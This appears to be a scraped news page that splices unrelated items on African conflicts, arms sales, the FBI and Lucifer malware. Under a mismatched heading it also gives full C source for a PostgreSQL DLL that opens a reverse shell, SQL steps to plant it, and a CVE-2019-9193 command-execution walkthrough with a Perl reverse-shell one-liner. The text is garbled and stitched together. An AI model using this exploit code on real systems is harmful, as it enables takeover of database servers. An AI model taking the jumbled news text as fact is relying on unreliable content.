Boeing has won a nearly $440 million contract to build new Apache AH-64E ground support combat helicopters for Morocco,

Boeing has won a nearly $440 million contract to build new Apache AH-64E ground support combat helicopters for Morocco, the Department of Defence announced in a press release.
"The Boeing Company of Mesa, Arizona was awarded a $439,179,677 modification contract for new-build Apache AH-64E aircraft and Longbow crew trainers", the release said on Thursday .
Fiscal Year 2020 Foreign Military Sales for Morocco for the full cost of the sale were obligated at the time of the award, the Defence Department added.
Work on the contract will be performed in Mesa in the US state of Arizona over the next five years with an estimated completion date of 1 March 2025, the release said.
On 14 May, Boeing won two cruise missile contracts worth over $2.6 billion combined to support foreign military sales to Saudi Arabia, Japan, India, South Korea, Qatar, Brazil, and The Netherlands.

The head of office of Monusco in Ituri, Cecilia Piazza condemns insecurity and killings by militiamen in ITURI and calls UN to establish another office in the province

The head of office of Monusco in Ituri, Cecilia Piazza made, during an exchange with the press on Monday June 29, 2020 in Bunia, a global return on the work of the UN mission in this province, during the two years of his mandate.
Although "not perfect", she judges the results of her institution to be "satisfactory".
Context of his arrival in Ituri.
It was the day after the outbreak of the atrocities in Djugu that Ms. Cecilia set foot in Ituri. A province plagued by insecurity. For two years, she managed in a "tense" context. CODECO militia activism, "an ongoing battle".
“Two intense years, just with the start of violence in Djugu. Djugu was at the heart of our work and continues to be, "she said.
According to her, the contribution of the UN mission has been of great importance in managing the security situation in Djugu and Mahagi.
In Djugu, several temporary bases have been set up, on the one hand, to ensure daily patrols, and on the other, to protect civilians, in particular displaced people housed in different sites (Blukwa, Bule, Fataki, etc.). An effective means of prevention against rebel attacks.
In the Mahagi territory, the temporary base at Ame, on the border with neighboring Djugu, was of great importance. In this part, very often, the attackers come from Djugu, pass there to commit their crime.
"This presence helped mitigate the infiltration. We have succeeded in stabilizing this limit between the two territories ", while also welcoming the" patrols along the national road N ° 27 ".
Regarding Mahagi, she thinks that beyond the infiltration of CODECO, there are "
earth-related tensions ”. What must find a solution, in the concern of lasting stability.
Peace, another process in Ituri.
In each territory, it leaves behind it, "many projects in progress". Peace, security, impunity, the protection of civilians, justice, youth, the DDR process, (...) the main part of the intervention of Monusco.
Addressing specifically the Djugu stabilization project, which will be executed by STAREC, she insisted on "political commitment and communities" for its "success".
Also, she said, the fight against impunity remains a major priority.
"It is a duty to the victims, to their relatives." Hence, we must "support military justice".
Despite the efforts made, her regret during her reign was that "violence is still there", she said. "I call on all the perpetrators to stop," insists Ms. Cecilia.
When falling, she did not fail to salute the welcome and collaboration of all social strata of Ituri, vis-à-vis Monusco, since her arrival. From the people, to civil society, to the provincial government.
From Bunia, in Ituri, Ms Piazza will go to Beni, in North Kivu, where she will have to assume a new responsibility, within the UN mission.
A new head of the office is therefore expected in the coming days, at the capital of Ituri, at the head of Monusco. In a province, so far, where insecurity is still persistent.

MONUSCO paid tribute to Sergeant Major Wahyudi Rama from the Indonesian contingent, killed on June 22, in an attack by armed men not far from the Semuliki bridge, on the road to Beni-Kasindi, the territory of Beni, North Kivu province. The tribute ceremony was organized on Saturday, June 27, at Beni airport, in the presence of both civilian and military officials of the UN Mission in DRC.
MONUSCO Force Commander, Lieutenant-General Augusto Ferreira Costa Neves; the Commander of the MONUSCO Integrated Force Brigade, Major-General Patrick Dube, and the Acting Mayor of the City of Beni, Modeste Bakwanamaha, took part in the tribute ceremony.

President Museveni ranked among the best presidents of the world

President Yoweri Kaguta Museveni has been ranked among the best President’s in the World, according to a New York University and World Bank experts who ranked the President 7th in terms of influencing economic growth.
The report first released in May 2018 by the World Bank economist Steve Penning’s and New York University Economics Professor William Easterly indicates that Museveni is one of the best leaders with a significant positive impact on their countries economic growth.
The two experts define the best leaders as any leaders for whom estimated leader effect is positive and significant at the 95% level and the worst leader are those with negative and insignificant leader effects.
The findings that were entitled “Shrinking dictators: how much economic growth can we attribute to national leaders” ranked Senior General Than Shwe of Burma as number one for being the most influential leader who steered his country’s economic growth at 3.95% and shrinkage of just 0.71%. He was the head of the State of Burma between 1992 and 2011 as chairman of the State Peace and development Council (SPDC).
“Leadership requires bold initiatives and President Museveni must be credited for this. It requires stringent and well thought out policies to reverse the decline our country was in and revamp the economy. Its not surprising the Museveni has firmly put this country on a steady economic growth,” Stephen Miyingo, the Senior Presidential Advisor on Economic Affairs said of the report. He said the report provides a third party independent opinion which confirms what the NRM government has been telling Ugandans.
Easterly and Hennings ranked 24 world leaders and President Museveni came in the 7th position, scoring higher than many powerful leaders globally including the former Prime Minister of Singapore Lee Kuan Yew and Park Chung-hee former President of South Korea between 1963 and 1979. Museveni’s significant contribution to Uganda’s economic growth is said to be a record 2.42% with a shrinkage of only 0.78% since he came to power in 1986.
The report also established that leaders like Yoweri Museveni and Seretse Khama of Botswana rank higher than Lee Kuan Yew of Singapore partly because they did will in relation to the lower average regional growth in Sub Saharan Africa compared to East and South Asia.
While making is assessment on Museveni contribution, the report highlighted the infrastructure development at its peak now with 5,350km total of paved roads compared to 987km of 1986. The General quality of lives and standard of living has improved tremendously together with an increase in incomes despite the increase in the population growth.
Other sectors highlighted include the employment sector with a national employment rate reducing from 11% to 8%, access to electricity grid has increased to 22% in 2017 from 14% in 2013 and access to water has also risen from 68% to78% during the same period. Revenue collections per annum has also increased, for instance in 2005/06 the total revenue collected was Shs 2.23 trillion compared to the estimated Shs 20trillion to be collected next financial year.
The report also highlighted the robust peace and security under Museveni that has been credited for the prevailing economic growth, restoration of freedom of speech, press freedom, freedom of worship relative democracy, effective foreign policy, education and tourism.

Lucifer malware also mines Monero cryptocurrency on infected devices ,also has ability todrop/run leaked NSA(National security agency,USA's national intelligence level) exploits including DoublePulsar, EternalBlue, and EternalRomance against vulnerable devices to enable intranet infection.

Palo Alto Networks’ Units 42 researchers have discovered a new version of a “hybrid crypto-jacking malware,” which they have dubbed “Lucifer.”
Lucifer malware is capable of launching DDoS attacks and can attack vulnerable Windows hosts using a variety of “trivial-to-exploit nature” flaws most of which are either rated ‘high’ or ‘critical.’
The first wave of this campaign was blocked by Palo Alto Networks on 10 June 2020, but the attacker resumed the campaign the very next day with an upgraded version of Lucifer malware. The campaign is still active and wreaking havoc by targeting Windows computers to mine for cryptocurrency and launching intense DDoS attacks.
Palo Alto Networks’ researchers observed that the new variant of Lucifer is immensely powerful as it performs crypto-jacking by dropping XMRig to mine for Monero cryptocurrency , connect to C&C server and enable self-propagation via exploiting multiple vulnerabilities along with launching credential brute-forcing.
Furthermore, it can drop/run leaked NSA exploits including DoublePulsar, EternalBlue, and EternalRomance against vulnerable devices to enable intranet infection.
“Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation” said on the researchers in a blog post . "

NSA exploits in action:

The malware developer named it Satan DDoS but since Satan Ransomware exists already, Palo Alto researchers chose to name it as Lucifer.
The good thing is that patches for weaponized security vulnerabilities are already available but hosts that haven’t been updated yet are still vulnerable to crypto-jacking. Researchers urge users to immediately apply the latest patches and updates to secure their devices.

Ituri province is on fire! 10 more people were killed by CODECO in the night of sunday-monday 29/06/2020

The attackers of the CODECO militia signed, on the night of Sunday to Monday, June 29, 2020, an attack in the locality Mungulumoya, 5 km from the center of Kunda in the chiefdom of Babelebe, in Irumu territory.
At least 10 civilians were killed and 3 others seriously wounded, during this attack of firearms and sharp bladed weapons.
Although the situation is already under control of the Congolese security forces, this locality remains emptied of its population, which has moved massively to the center of Kunda, about ten kilometers from the city of Bunia.
Faced with this situation, the provincial deputy Claude Malabo, urges the Congolese state to better secure the inhabitants, unjustly massacred.
"The army must secure the entities threatened by these enemies of peace. But I believe that we must also succeed in destroying them definitively. The population no longer knows how to live in peace following permanent threats, "said this elected representative from Irumu's electoral district.
In addition to Djugu and Mahagi, in recent months, certain entities in Irumu territory have also been the target of this militia of the Cooperation for the Development of Congo (CODECO).

More on that Attack!

#define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1" #define PG_REVSHELL_CALLHOME_PORT "4444"
#include "postgres.h" #include <string.h> #include "fmgr.h" #include "utils/geo_decls.h" #include <winsock2.h>
#pragma comment(lib,"ws2_32")
#ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endif
#pragma warning(push) #pragma warning(disable: 4996) #define _WINSOCK_DEPRECATED_NO_WARNINGS
BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL,                     _In_ DWORD fdwReason,                     _In_ LPVOID lpvReserved) {     WSADATA wsaData;     SOCKET wsock;     struct sockaddr_in server;     char ip_addr[16];     STARTUPINFOA startupinfo;     PROCESS_INFORMATION processinfo;
    char *program = "cmd.exe";     const char *ip = PG_REVSHELL_CALLHOME_SERVER;     u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);
    WSAStartup(MAKEWORD(2, 2), &wsaData);     wsock = WSASocket(AF_INET, SOCK_STREAM,                       IPPROTO_TCP, NULL, 0, 0);
    struct hostent *host;     host = gethostbyname(ip);     strcpy_s(ip_addr, sizeof(ip_addr),              inet_ntoa(*((struct in_addr *)host->h_addr)));
    server.sin_family = AF_INET;     server.sin_port = htons(port);     server.sin_addr.s_addr = inet_addr(ip_addr);
    WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server),               NULL, NULL, NULL, NULL);
    memset(&startupinfo, 0, sizeof(startupinfo));     startupinfo.cb = sizeof(startupinfo);     startupinfo.dwFlags = STARTF_USESTDHANDLES;     startupinfo.hStdInput = startupinfo.hStdOutput =                             startupinfo.hStdError = (HANDLE)wsock;
    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0,                   NULL, NULL, &startupinfo, &processinfo);
    return TRUE; }
#pragma warning(pop) /* re-enable 4996 */
/* Add a prototype marked PGDLLEXPORT */ PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);
PG_FUNCTION_INFO_V1(add_one);
Datum dummy_function(PG_FUNCTION_ARGS) {     int32 arg = PG_GETARG_INT32(0);
    PG_RETURN_INT32(arg + 1); }
Here is the convoluted process of exploitation:
postgres=# CREATE TABLE hextable (hex bytea); postgres=# CREATE TABLE lodump (lo OID);
acidic@emma:~/$ echo "INSERT INTO hextable (hex) VALUES               (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt acidic@emma:~/$ psql -U postgres --host=localhost --file=sql.txt
postgres=# INSERT INTO lodump SELECT hex FROM hextable; postgres=# SELECT * FROM lodump;   lo -------  16409 (1 row) postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll'); postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS            'C:\Program Files\PostgreSQL\9.5\binpg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;

The arbitral command execution on postgreSQL

PostgreSQL, commonly known as Postgres is one of the largest and most popular database systems in the world. It is the primary database of Mac OSX but also has Linux and Windows versions available.
For a time I have been dealing with postgreSQL,I have keenly been monitoring the less well known ‘feature’ (CVE-2019–9193) which allows certain database users to gain arbitrary code execution in the context of the user running the Postgres instance. This is something which is enabled by default on all versions of PostgreSQL from 9.3 through to the latest of 11.2. This affects all operating systems, Windows, Linux and Mac.
Since version 9.3, new functionality for ‘COPY TO/FROM PROGRAM’ was implemented. This allows the database superuser, and any user in the ‘pg_execute_server_program’ group to run arbitrary operating system commands. This effectively means there is no separation of privilege between a database superuser user and the user running the database on the operating system.
This is a lack of defense in depth which we used to see in Microsoft SQL Server back in the early 2000s, when the xp_cmdshell function was enabled by default. This was patched and disabled by default in Microsoft SQL Server 2005, but it is interesting how the same bugs repeat, seemingly in cycles.
As this bug/flaw/functionality/exploit is somewhere between a privilege escalation and an arbitrary code execution, it needs some kind of prior authentication. This is achieved either through access to the database with credentials, or via exploiting an SQL injection in an application which has PostgreSQL on the backend. Again, in both of these instances either the superuser or a user with ‘pg_execute_server_program’ permissions needs to be in use.
To perform the attack, you simply follow these steps:
1) [Optional] Drop the table you want to use if it already exists
DROP TABLE IF EXISTS cmd_exec;
2) Create the table you want to hold the command output
CREATE TABLE cmd_exec(cmd_output text);
3) Run the system command via the COPY FROM PROGRAM function
COPY cmd_exec FROM PROGRAM ‘id’;
4) [Optional] View the results
SELECT * FROM cmd_exec;
5) [Optional] Clean up after yourself
DROP TABLE IF EXISTS cmd_exec;
Note that any single quotes inside your command must be double single quotes to escape them, so for example if you wanted to run:
echo ‘hello’;
You would need to put it inside single quotes, and then replace all single quotes inside with double single quotes:
‘echo ‘’hello’’;’
I have tested this on all major operating systems, and if a reverse shell is triggered you end up with the following privileges:
Windows - NT AUTHORITY/NETWORK SERVICE (low priv)
Linux - postgres (low priv)
Mac - user that installed postgres (usually an admin)
Linux and Mac OSX can usually be exploited with a perl one liner, with a command such as this:
COPY files FROM PROGRAM ‘perl -MIO -e ‘’$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’’’;
I have simplified the exploitation processes by releasing a new
Metasploit module (which should be
merged into the main framework soon), as the old postgres_payload modules only work up to around version 8. postgres_copy_from_program_cmd_exec.rb performs all of the above automatically, if you provide it with valid database credentials which have the correct permissions. For SQL Injections you will have to take the manual route. Here it’s exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04:
For Windows however, the NETWORK SERVICE user appears not the have any write privileges, but it was still possible to trigger a reverse shell by using a PowerShell download cradle. This can be provided by settings the COMMAND variable to the PowerShell cradle command, take note to escape single quotes with a backslash \. 

The Somali national army seized 4 starategic villages from alshabab this ended weekend

The Somali National Army has seized four new strategic villages from Al-Shabaab militant group in Lower Juba region on Sunday.
The operations conducted by the government troops have taken the control of some villages including Janay Abdale, Hilishid, Mayonde and Garasceebe under Lower Juba region.
Lieutenant Ismail Abdimalik Moalim, the commander of the 16th brigade of the Danab forces, said the operations would continue until the troops reached all the areas controlled by AL-Shabab fighters.
The commander of the Darwish forces in the Jubbaland region told the media that he had begun operations against militias in the central town of Buale but still needs more effort to capture.
The forces have been conducting operations against al-Shabaab in the Lower Juba region in recent days to flash out Al-Shabab militant group in the region.

FBI refuses to reveal Christopher Steele’s primary source for his notorious ‘Trump-Russia’ dossier in response to a Freedom of Information

The identity of the source remains an enduring mystery, but whoever they are, they undoubtedly possess information that could shed light on innumerable inaccuracies in the dossier, which was cited extensively by the Bureau in its various applications for surveillance orders against Donald Trump campaign aide Carter Page.
The US Federal Bureau of Investigation has refused to release documents related to Christopher Steele’s primary source for his notorious ‘Trump-Russia’ dossier in response to a Freedom of Information request filed by The Daily Caller, on the basis the information is classified and risks identifying a confidential FBI source.
The Daily Caller sought all FBI records for an individual identified as “Primary Sub-Source” in Justice Department inspector general Michael Horowitz report on Crossfire Hurricane, issued December 2019 – the assessment found Steele’s source contradicted and dismissed key allegations made in the dossier, after they were tracked down and interviewed by FBI agents in January 2017. The former MI6 operative nonetheless dressed up “rumour and speculation” as fact – and the Justice Department ruled two FISA warrants to be invalid due to the Bureau’s omission of this compromising information.
— Chuck Bledsoe@gab.ai ✝ ﻥ #CCOT #MAGA🇺🇸 (@BledsoeChuck) June 26, 2020
In its response to the outlet, the FBI cited three exemptions under Freedom of Information laws to deny releasing the sought documents.
“The nature of your request implicates records the FBI compiles pursuant to its national security and foreign intelligence functions. [Disclosure] would trigger harm to national security interests…and/or reveal intelligence sources and methods. Disclosing source related records about an individual or entity could reasonably be expected to undermine the use of confidential sources as it would discourage cooperation with the FBI in the future. Therefore, your request is closed,” the Bureau stated.
It’s unclear if the FBI considers Steele’s source to be a confidential informant, but Steele himself reportedly told partners at Fusion GPS – the opposition research firm that commissioned the dossier – the individual was “well known to US intelligence and law enforcement officials”.
— Catherine Herridge (@CBS_Herridge) June 12, 2020
Republican lawmakers investigating the origins of the FBI’s investigation of the Trump campaign have recently accused agency director Christopher Wray of releasing documents about the probe too slowly. For instance, Jim Jordan of the House Judiciary Committee, has accused Wray of outright obstinance, while Lindsey Graham, chair of the Senate Judiciary Committee, wrote Attorney General William Barr on April 20 demanding all documents and communications related to the FBI’s interviews with the source, including FBI reports written about the individual, be released.

Iran creates new army weapons including rocket launchers and missiles

The new weapons, developed by a Revolutionary Guards’ agency responsible for military R&D, have been unveiled amid the Trump administration’s ongoing effort to convince the international community to continue to enforce an arms embargo against Tehran after its October expiry date.
Gen. Ali Koohestani, director of the Revolutionary Guards’ Ground Force Self-Sufficiency Jihad Organization, has given Tasnim News Agency a sneak peek at several new weapons systems for use by infantry formations.
The arms include the Qare’a, a disposable, lightweight rocket launcher made of composite materials, which features a rocket engine-powered 80 mm caliber missile. The weapon is said to have an effective range of 250 meters, and to be ideal for anti-fortification use.

Another of the R&D agency’s designs is a man-portable recoilless rifle dubbed the Nafez-2 (‘Penetrator-2’), a 19 kg anti-armour system which can also be used against enemy emplacements.
Finally, Koohestani unveiled the Ashtar, a unique, lightweight 7.62x64 mm sniper rifle with a range of up to one kilometer and a 24x optical scope.

It’s not clear from the report what stage of development the weapons are in, or whether they have been delivered to the military.
The Tasnim report comes just a day after the IRGC unveiled other arms, including a new armoured personnel carrier, drone and truck-mounted heavy machine-gun, all of them also developed by the Guards’ Ground Force Research and Self-Sufficiency Jihad Organization.
Despite spending just a fraction of what its regional adversaries and the US do on defence, Iran has managed to gain self-sufficiency in a range of areas, becoming one of just a handful of countries capable of building advanced drones and air defence systems, for example. The country began making a push toward self-sufficiency in defence in the 1980s after its US and Western European partners cut Tehran off from its traditional sources of arms following the Iranian Revolution and the Iraqi invasion. Before that, throughout the 1960s and 1970s, the country was one of the largest importers of US weapons systems in the Middle East.
Further moves toward self-sufficiency followed in 2010, after the United Nations Security Council introduced a weapons embargo against the Islamic Republic over its alleged nuclear program.
After 2015 and the signing of the Iran nuclear deal, the UN committed to lift its arms embargo in October 2020. However, beginning earlier this year, the US has lobbied to keep the restrictions in place, going so far as to argue that for all intents and purposes, Washington is still a party to the nuclear deal it withdrew from in 2018. Russian and Chinese diplomats have dismissed US lobbying efforts and hinted that they would veto any American effort to extend the embargo.